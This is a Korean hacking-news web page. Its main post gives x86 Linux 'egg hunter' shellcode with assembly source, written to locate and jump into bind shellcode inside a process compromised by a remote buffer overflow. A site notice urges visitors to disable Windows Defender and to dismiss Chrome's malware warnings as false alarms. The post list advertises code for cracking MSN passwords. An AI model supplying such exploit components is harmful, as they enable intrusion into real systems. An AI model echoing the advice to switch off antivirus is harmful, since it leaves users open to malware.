Donation bitcoin(기부용 비트코인 주소)

1Pq3K39XM5xx4CifGKgppXeavtWNNHH7K4

기부하신 비트코인은 "보안 취약 계층"을 위해 사용되고 있습니다.

Donation bitcoin(기부용 비트코인 주소)

1Pq3K39XM5xx4CifGKgppXeavtWNNHH7K4

기부하신 비트코인은 "보안 취약 계층"을 위해 사용되고 있습니다.

공지

1. MS 엣지 브라우저에서의 경고창은 '윈도우 디펜더'를 끄시면 됩니다.              '윈도우 디펜더 끄기' 2. 크롬 브라우저로 접속시 나오는 악성코드 경고창은 구글 크롬의 에러, 즉 오탐(탐지 오류)이므로 무시하시면 됩니다. 3. 이 사이트는 안전하며 깨끗하다는 것을 알려 드립니다. 4. 무고한 사이트들에 대한 공룡 기업 브라우저들의 무차별적인 '탐지 오류 횡포'가 사용자들의 정보 공유의 자유를 침해하고 있습니다. 이에 대응하여 이 기업들을 상대로 소송을 준비하고 있습니다.

해커즈뉴스 제공 리눅스 + 스마트폰의 모든것

	No, 842 조회: 1583 버퍼오버플로우를 자동으로 한다  이 소스는 어드레스 공간을 스캔한 다음 버퍼오버플로우의 취약점이 발견되면 그대로 jump 해 들어간다. /* find_shell code -================= what is it? """"""""""" assume you have a remote bof with limited buffer space so you can't store your bindshellcode in the buffer, but you can store it "somewhere". this code once executed scans the address space of the vulnerable process for a certain pattern. once found it jumps into it. scans address space...erm...segfaults? """"""""""""""""""""""""""""""""""""""" no segfaults here (i hope). while looking for a way to avoid segfaults i was browsing through the linux syscall list and found syscall #13 (chdir) which only takes a ptr to the pathname. after playing around with it i noticed that it returns 0xfffffffe if this ptr points to a valid (mapped) address and 0xfffffff2 for an invalid address. this fact is used in the code to avoid accessing unmapped memory causing sigsegv. how to use? """"""""""" make sure you scan for at least "unlikely" patterns ;) if you modify the pattern make sure it is 0xPATTERN-1 because if 0xPATTERN exists as is in memory you could find _this_ scanner code and start an infinite loop.. if size matters you could leave out the part that sets %ebx and re-use the remaining value from the attacked process. below is a timig of a scan starting from 0x00000000 to the data segment: qobaiashi@cocoon:~> time find_shell www.u-n-f.com real 5m48.650s user 0m25.510s sys 5m13.100s it should also be possible to split larger code in small pieces and have them stored at random locations. then the code parts would look like: shellcode_part_1 pushad find_next_steps_pattern=0x11223344 . . . 0x11223344 popad shellcode_part_2 pushad find_next_steps_pattern=0x55667788 . . 0x55667788 popad shellcode_part_3 etc.     //28 bytes char find_shell[] = "\xbb\x01\x80\x04\x08" // mov $0x8048001,%ebx "\xbe\x40\x41\x41\x41" // mov $0x41414140,%esi "\x46" // inc %esi "\x31\xc0" // CHECK:xor %eax,%eax "\x43" // inc %ebx "\xb0\x0c" // mov $0xc,%al "\xcd\x80" // int $0x80 "\x3c\xfe" // cmp $0xfe,%al "\x75\xf5" // jne 8048327 <CHECK> "\x3b\x33" // cmp (%ebx),%esi "\x75\xf1" // jne 8048327 <CHECK> "\xff\xe3" // jmp *%ebx greetings     qobaiashi@u-n-f.com */ char shellcode[] = "\x41\x41\x41\x41" "\xeb\x15\x59\x31\xc0\x31\xdb\x31\xd2\x83\xc0\x04" "\x43\x83\xc2\x0e\xcd\x80\x89\xd8\x4b\xcd\x80\xe8" "\xe6\xff\xff\xff\www.u-n-f.com\n"; unsigned long findcode() { __asm__( "nop\n" "nop\n" "nop\n" "nop\n" //"xor %ebx, %ebx \n" //zero ptr \ leave them out "movl $0x08048001, %ebx \n" //addr to start/ to save some bytes, then you re-use ebx..                                  //elf-base++: faster scan "movl $0x41414140, %esi \n" //find this (pattern-1) "inc %esi \n" //=pattern: avoids finding THIS code snip! "CHECK: \n" //you could start at 0x00000000 to get smaller code "xor %eax, %eax \n" "inc %ebx \n" //ptr++ "mov $0x0c, %al \n" //syscall = time "int $0x80 \n" // "cmp $0xfe, %al \n" // was it valid? //wasnotvalid: "jne CHECK \n" // fixme: exit? //wasvalid "cmpl (%ebx), %esi \n" //are you our egg? "jne CHECK \n" //nope "jmp *%ebx \n" //got you :p "nop\n" "nop\n" "nop\n" "nop\n" ); } main() { findcode(); } 번호 제 목 종류 작성일 844   [다운]웹보안 감사툴을 쉽게 만든다 - RLWAL03   08-31 843   MSN Messenger 비밀번호 푸는 소스   08-30 842   버퍼오버플로우를 자동으로 한다   08-29 841   스티키 비트란?   08-28 840   [다운]보안 기능이 들어간 툴을 쉽게 개발한다 - y...   08-27 839   디렉토리변경   08-26 838   파일변경   08-25 837   명령어 관리 종합편   08-24 836   프롬프트 설정하기 종합편   08-23 835   사용자 신상정보 관리하기 종합편   08-22